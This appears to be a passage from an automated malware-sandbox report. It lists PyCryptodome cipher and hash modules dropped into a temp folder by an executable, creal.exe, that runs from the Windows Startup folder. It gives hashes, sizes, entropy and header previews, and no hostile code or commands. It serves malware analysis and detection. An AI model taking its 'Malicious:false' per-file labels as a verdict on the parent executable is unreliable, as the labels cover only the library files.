                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*...*...*...R...*...U...*..R...*...*...*...U...*...U...*...U...*.....*.....*...}..*.....*..Rich.*..........................PE..d....e.........." ...%............P.....................................................`..........................................9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......,..............@....pdata..|....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_aes.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):36352
                                                                                                                                                                                                              Entropy (8bit):6.558176937399355
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Dz2P+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuCLg46:DzeqWB7YJlmLJ3oD/S4j990th9VCsC
                                                                                                                                                                                                              MD5:F751792DF10CDEED391D361E82DAF596
                                                                                                                                                                                                              SHA1:3440738AF3C88A4255506B55A673398838B4CEAC
                                                                                                                                                                                                              SHA-256:9524D1DADCD2F2B0190C1B8EDE8E5199706F3D6C19D3FB005809ED4FEBF3E8B5
                                                                                                                                                                                                              SHA-512:6159F245418AB7AD897B02F1AADF1079608E533B9C75006EFAF24717917EAA159846EE5DFC0E85C6CFF8810319EFECBA80C1D51D1F115F00EC1AFF253E312C00
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%.H...H......P.....................................................`.................................................,...d...............................4... ...................................@............`...............................text....F.......H.................. ..`.rdata..d6...`...8...L..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_aesni.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15872
                                                                                                                                                                                                              Entropy (8bit):5.285191078037458
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:wJBjJHEkEPYi3Xd+dc26E4++yuqAyXW9wifD4jqccqgwYUMvEW:ikRwi3wO26Ef+yuIm9PfD7wgwYUMvE
                                                                                                                                                                                                              MD5:BBEA5FFAE18BF0B5679D5C5BCD762D5A
                                                                                                                                                                                                              SHA1:D7C2721795113370377A1C60E5CEF393473F0CC5
                                                                                                                                                                                                              SHA-256:1F4288A098DA3AAC2ADD54E83C8C9F2041EC895263F20576417A92E1E5B421C1
                                                                                                                                                                                                              SHA-512:0932EC5E69696D6DD559C30C19FC5A481BEFA38539013B9541D84499F2B6834A2FFE64A1008A1724E456FF15DDA6268B7B0AD8BA14918E2333567277B3716CC4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........TX..:...:...:.....:..;...:...;...:...;...:..?...:..>...:..9...:..R2...:..R:...:..R....:..R8...:.Rich..:.................PE..d....e.........." ...%. ... ......P.....................................................`..........................................9......D:..d....`.......P...............p..,....3...............................1..@............0.. ............................text...h........ .................. ..`.rdata.......0.......$..............@..@.data...(....@.......4..............@....pdata.......P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_arc2.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                              Entropy (8bit):5.505471888568532
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:vd9VkyQ5f8vjVaCHpKpTTjaNe7oca2DW3Q2dhmdcqgwNeecBih:JkP5cjIGpKlqD2D4kzgwNeE
                                                                                                                                                                                                              MD5:D2175300E065347D13211F5BF7581602
                                                                                                                                                                                                              SHA1:3AE92C0B0ECDA1F6B240096A4E68D16D3DB1FFB0
                                                                                                                                                                                                              SHA-256:94556934E3F9EE73C77552D2F3FC369C02D62A4C9E7143E472F8E3EE8C00AEE1
                                                                                                                                                                                                              SHA-512:6156D744800206A431DEE418A1C561FFB45D726DC75467A91D26EE98503B280C6595CDEA02BDA6A023235BD010835EA1FC9CB843E9FEC3501980B47B6B490AF7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%."... ......P.....................................................`.........................................0J.......J..d....p.......`..................,....C...............................B..@............@...............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...8....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_blowfish.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20992
                                                                                                                                                                                                              Entropy (8bit):6.06124024160806
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:bUv5cJMOZA0nmwBD+XpJgLa0Mp8Qpg4P2llyM:0K1XBD+DgLa1yTi
                                                                                                                                                                                                              MD5:45616B10ABE82D5BB18B9C3AB446E113
                                                                                                                                                                                                              SHA1:91B2C0B0F690AE3ABFD9B0B92A9EA6167049B818
                                                                                                                                                                                                              SHA-256:F348DB1843B8F38A23AEE09DD52FB50D3771361C0D529C9C9E142A251CC1D1EC
                                                                                                                                                                                                              SHA-512:ACEA8C1A3A1FA19034FD913C8BE93D5E273B7719D76CB71C36F510042918EA1D9B44AC84D849570F9508D635B4829D3E10C36A461EC63825BA178F5AC1DE85FB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.$...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text....".......$.................. ..`.rdata..L....@... ...(..............@..@.data...8....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..4............P..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cast.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25088
                                                                                                                                                                                                              Entropy (8bit):6.475467273446457
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:oc6HLZiMDFuGu+XHZXmrfXA+UA10ol31tuXy4IYgLWi:B6H1TZXX5XmrXA+NNxWiFdLWi
                                                                                                                                                                                                              MD5:CF3C2F35C37AA066FA06113839C8A857
                                                                                                                                                                                                              SHA1:39F3B0AEFB771D871A93681B780DA3BD85A6EDD0
                                                                                                                                                                                                              SHA-256:1261783F8881642C3466B96FA5879A492EA9E0DAB41284ED9E4A82E8BCF00C80
                                                                                                                                                                                                              SHA-512:1C36B80AAE49FD5E826E95D83297AE153FDB2BC652A47D853DF31449E99D5C29F42ED82671E2996AF60DCFB862EC5536BB0A68635D4E33D33F8901711C0C8BE6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.$...@............................................................`.........................................@i.......i..d...............................4....b...............................a..@............@...............................text....#.......$.................. ..`.rdata.......@...0...(..............@..@.data...8....p.......X..............@....pdata...............Z..............@..@.rsrc................^..............@..@.reloc..4............`..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cbc.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.838534302892255
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:0F/1nb2mhQtkr+juOxKbDbnHcqgYvEkrK:u2f6iuOsbDtgYvEmK
                                                                                                                                                                                                              MD5:20708935FDD89B3EDDEEA27D4D0EA52A
                                                                                                                                                                                                              SHA1:85A9FE2C7C5D97FD02B47327E431D88A1DC865F7
                                                                                                                                                                                                              SHA-256:11DD1B49F70DB23617E84E08E709D4A9C86759D911A24EBDDFB91C414CC7F375
                                                                                                                                                                                                              SHA-512:F28C31B425DC38B5E9AD87B95E8071997E4A6F444608E57867016178CD0CA3E9F73A4B7F2A0A704E45F75B7DCFF54490510C6BF8461F3261F676E9294506D09B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cfb.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13824
                                                                                                                                                                                                              Entropy (8bit):4.9047185025862925
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:NRgPX8lvI+KnwSDTPUDEhKWPXcqgzQkvEd:2og9rUD9mpgzQkvE
                                                                                                                                                                                                              MD5:43BBE5D04460BD5847000804234321A6
                                                                                                                                                                                                              SHA1:3CAE8C4982BBD73AF26EB8C6413671425828DBB7
                                                                                                                                                                                                              SHA-256:FAA41385D0DB8D4EE2EE74EE540BC879CF2E884BEE87655FF3C89C8C517EED45
                                                                                                                                                                                                              SHA-512:DBC60F1D11D63BEBBAB3C742FB827EFBDE6DFF3C563AE1703892D5643D5906751DB3815B97CBFB7DA5FCD306017E4A1CDCC0CDD0E61ADF20E0816F9C88FE2C9B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d....e.........." ...%..... ......P.....................................................`..........................................9.......9..d....`.......P..d............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ctr.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14848
                                                                                                                                                                                                              Entropy (8bit):5.300163691206422
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:j0J1gSHxKkwv0i8XSi3Sm57NEEE/qexUEtDrdkrRcqgUF6+6vEX:jM01si8XSi3SACqe7tDeDgUUjvE
                                                                                                                                                                                                              MD5:C6B20332B4814799E643BADFFD8DF2CD
                                                                                                                                                                                                              SHA1:E7DA1C1F09F6EC9A84AF0AB0616AFEA55A58E984
                                                                                                                                                                                                              SHA-256:61C7A532E108F67874EF2E17244358DF19158F6142680F5B21032BA4889AC5D8
                                                                                                                                                                                                              SHA-512:D50C7F67D2DFB268AD4CF18E16159604B6E8A50EA4F0C9137E26619FD7835FAAD323B5F6A2B8E3EC1C023E0678BCBE5D0F867CD711C5CD405BD207212228B2B4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K,..*B..*B..*B..R...*B..UC..*B.RC..*B..*C..*B..UG..*B..UF..*B..UA..*B..J..*B..B..*B....*B..@..*B.Rich.*B.........................PE..d....e.........." ...%..... ......P.....................................................`..........................................9......x:..d....`.......P...............p..,....3...............................1..@............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_des.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                                              Entropy (8bit):4.260220483695234
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:9XUqVT1dZ/GHkJnYcZiGKdZHDLtiduprZNZY0JAIg+v:99HGHfJidSK
                                                                                                                                                                                                              MD5:0B538205388FDD99A043EE3AFAA074E4
                                                                                                                                                                                                              SHA1:E0DD9306F1DBE78F7F45A94834783E7E886EB70F
                                                                                                                                                                                                              SHA-256:C4769D3E6EB2A2FECB5DEC602D45D3E785C63BB96297268E3ED069CC4A019B1A
                                                                                                                                                                                                              SHA-512:2F4109E42DB7BC72EB50BCCC21EB200095312EA00763A255A38A4E35A77C04607E1DB7BB69A11E1D80532767B20BAA4860C05F52F32BF1C81FE61A7ECCEB35ED
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d....e.........." ...%.8...................................................0............`.....................................................d...............l............ ..4...................................@...@............P...............................text....7.......8.................. ..`.rdata..f....P.......<..............@..@.data...8...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_des3.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):58368
                                                                                                                                                                                                              Entropy (8bit):4.276870967324261
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:9jUqho9weF5/eHkRnYcZiGKdZHDL7idErZjZYXGg:9RCneH//id42
                                                                                                                                                                                                              MD5:6C3E976AB9F47825A5BD9F73E8DBA74E
                                                                                                                                                                                                              SHA1:4C6EB447FE8F195CF7F4B594CE7EAF928F52B23A
                                                                                                                                                                                                              SHA-256:238CDB6B8FB611DB4626E6D202E125E2C174C8F73AE8A3273B45A0FC18DEA70C
                                                                                                                                                                                                              SHA-512:B19516F00CC0484D9CDA82A482BBFE41635CDBBE19C13F1E63F033C9A68DD36798C44F04D6BD8BAE6523A845E852D81ACADD0D5DD86AF62CC9D081B803F8DF7B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d....e.........." ...%.:...................................................0............`.................................................P...d............................ ..4...................................@...@............P...............................text...x9.......:.................. ..`.rdata.......P.......>..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ecb.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10752
                                                                                                                                                                                                              Entropy (8bit):4.578113904149635
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:R0qVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EpmFWLOXDwo2Pj15XkcX6gbW6z:DVddiT7pgTctEEI4qXDo11kcqgbW6
                                                                                                                                                                                                              MD5:FEE13D4FB947835DBB62ACA7EAFF44EF
                                                                                                                                                                                                              SHA1:7CC088AB68F90C563D1FE22D5E3C3F9E414EFC04
                                                                                                                                                                                                              SHA-256:3E0D07BBF93E0748B42B1C2550F48F0D81597486038C22548224584AE178A543
                                                                                                                                                                                                              SHA-512:DEA92F935BC710DF6866E89CC6EB5B53FC7ADF0F14F3D381B89D7869590A1B0B1F98F347664F7A19C6078E7AA3EB0F773FFCB711CC4275D0ECD54030D6CF5CB2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................p'......((..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_eksblowfish.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):22016
                                                                                                                                                                                                              Entropy (8bit):6.143719741413071
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:IUv5cRUtPQtjLJiKMjNrDF6pJgLa0Mp8Q90gYP2lXCM:BKR8I+K0lDFQgLa17zU
                                                                                                                                                                                                              MD5:76F88D89643B0E622263AF676A65A8B4
                                                                                                                                                                                                              SHA1:93A365060E98890E06D5C2D61EFBAD12F5D02E06
                                                                                                                                                                                                              SHA-256:605C86145B3018A5E751C6D61FD0F85CF4A9EBF2AD1F3009A4E68CF9F1A63E49
                                                                                                                                                                                                              SHA-512:979B97AAC01633C46C048010FA886EBB09CFDB5520E415F698616987AE850FD342A4210A8DC0FAC1E059599F253565862892171403F5E4F83754D02D2EF3F366
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.(...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text...X'.......(.................. ..`.rdata..T....@... ...,..............@..@.data...8....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..4............T..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ocb.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):17920
                                                                                                                                                                                                              Entropy (8bit):5.353267174592179
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:7PHNP3Mj7Be/yB/6sB3yxcb+IMcOYqQViCBD8bg6Vf4A:hPcnB8KSsB34cb+bcOYpMCBDX
                                                                                                                                                                                                              MD5:D48BFFA1AF800F6969CFB356D3F75AA6
                                                                                                                                                                                                              SHA1:2A0D8968D74EBC879A17045EFE86C7FB5C54AEE6
                                                                                                                                                                                                              SHA-256:4AA5E9CE7A76B301766D3ECBB06D2E42C2F09D0743605A91BF83069FEFE3A4DE
                                                                                                                                                                                                              SHA-512:30D14AD8C68B043CC49EAFB460B69E83A15900CB68B4E0CBB379FF5BA260194965EF300EB715308E7211A743FF07FA7F8779E174368DCAA7F704E43068CC4858
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.(... ......P.....................................................`..........................................I.......J..d....p.......`..................,....C...............................A..@............@...............................text....'.......(.................. ..`.rdata..8....@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ofb.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.741247880746506
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:0F/1nb2mhQtkgU7L9D037tfcqgYvEJPb:u2f6L9DSJxgYvEJj
                                                                                                                                                                                                              MD5:4D9182783EF19411EBD9F1F864A2EF2F
                                                                                                                                                                                                              SHA1:DDC9F878B88E7B51B5F68A3F99A0857E362B0361
                                                                                                                                                                                                              SHA-256:C9F4C5FFCDD4F8814F8C07CE532A164AB699AE8CDE737DF02D6ECD7B5DD52DBD
                                                                                                                                                                                                              SHA-512:8F983984F0594C2CAC447E9D75B86D6EC08ED1C789958AFA835B0D1239FD4D7EBE16408D080E7FCE17C379954609A93FC730B11BE6F4A024E7D13D042B27F185
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_BLAKE2b.pyd

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14848
                                                                                                                                                                                                              Entropy (8bit):5.212941287344097
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:2F/1nb2mhQtkRySMfJ2ycxFzShJD9bAal2QDeJKcqgQx2QY:M2fKRQB2j8JD2fJagQx2QY
                                                                                                                                                                                                              MD5:F4EDB3207E27D5F1ACBBB45AAFCB6D02
                                                                                                                                                                                                              SHA1:8EAB478CA441B8AD7130881B16E5FAD0B119D3F0
                                                                                                                                                                                                              SHA-256:3274F49BE39A996C5E5D27376F46A1039B6333665BB88AF1CA6D37550FA27B29
                                                                                                                                                                                                              SHA-512:7BDEBF9829CB26C010FCE1C69E7580191084BCDA3E2847581D0238AF1CAA87E68D44B052424FDC447434D971BB481047F8F2DA1B1DEF6B18684E79E63C6FBDC5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%..... ......P.....................................................`..........................................9......|:..d....`.......P..@............p..,....3...............................2..@............0...............................text...X........................... ..`.rdata.......0....... ..............@..@.data...8....@.......0..............@....pdata..@....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_BLAKE2s.pyd

                                                                                                                                                                                                              Download File
